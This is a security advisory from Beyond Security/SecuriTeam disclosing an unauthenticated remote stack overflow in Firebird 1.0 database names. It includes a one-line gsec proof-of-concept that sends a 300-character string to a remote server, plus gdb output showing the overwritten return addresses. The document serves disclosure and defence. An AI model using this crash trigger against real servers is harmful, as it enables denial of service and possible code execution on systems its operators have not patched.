Firebird Database Remote Database Name Overflow ------------------------------------------------------------------------ Article reference: http://www.securiteam.com/unixfocus/5AP0P0UCUO.html SUMMARY Firebird is "a relational database offering many ANSI SQL-92 features that runs on Linux, Windows, and a variety of Unix platforms. Firebird offers excellent concurrency, high performance, and powerful language support for stored procedures and triggers. It has been used in production systems, under a variety of names since 1981". A vulnerability in Firebird Database's way of handling database names, allows an unauthenticated user to cause the server to crash, and overwrite critical section of the stack used by the database. DETAILS Vulnerable Systems: * Firebird Database version 1.0 (1.0.2-2.1) - Debian unstable Immune Systems: * Firebird Database version 1.5.0 (others are presumed to be immune as well) By issuing: gsec -database 192.168.1.52:`perl -e'print ("A"x300)'` -user whenever -password whatever On a remote server, you can see that: gdb /usr/lib/firebird/bin/ibserver GNU gdb 6.1-debian Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-linux"...(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1". (gdb) r Starting program: /usr/lib/firebird/bin/ibserver (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...[Thread debugging using libthread_db enabled] [New Thread 1075462272 (LWP 31389)] (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...[New Thread 1092549552 (LWP 31392)] [New Thread 1100938160 (LWP 31393)] [Thread 1100938160 (LWP 31393) exited] [Thread 1092549552 (LWP 31392) exited] [New Thread 1092549552 (LWP 31396)] Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 1092549552 (LWP 31396)] 0x08132223 in ERR_post () (gdb) bt #0 0x08132223 in ERR_post () #1 0x080942ac in THD_wlck_unlock () #2 0x41414141 in ?? () #3 0x41414141 in ?? () #4 0x41414141 in ?? () #5 0x41414141 in ?? () #6 0x41414141 in ?? () #7 0x41414141 in ?? () #8 0x00414141 in ?? () #9 0x0000012c in ?? () .. Solution: Debian is currently not maintaining this version of the product, so it is recommended that you use a source code based installation. ADDITIONAL INFORMATION The information has been provided by Noam Rathaus. Regards, Aviram Jenik Beyond Security Ltd. http://www.BeyondSecurity.com http://www.SecuriTeam.com The First Integrated Network and Web Application Vulnerability Scanner: http://www.beyondsecurity.com/webscan-wp.pdf ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.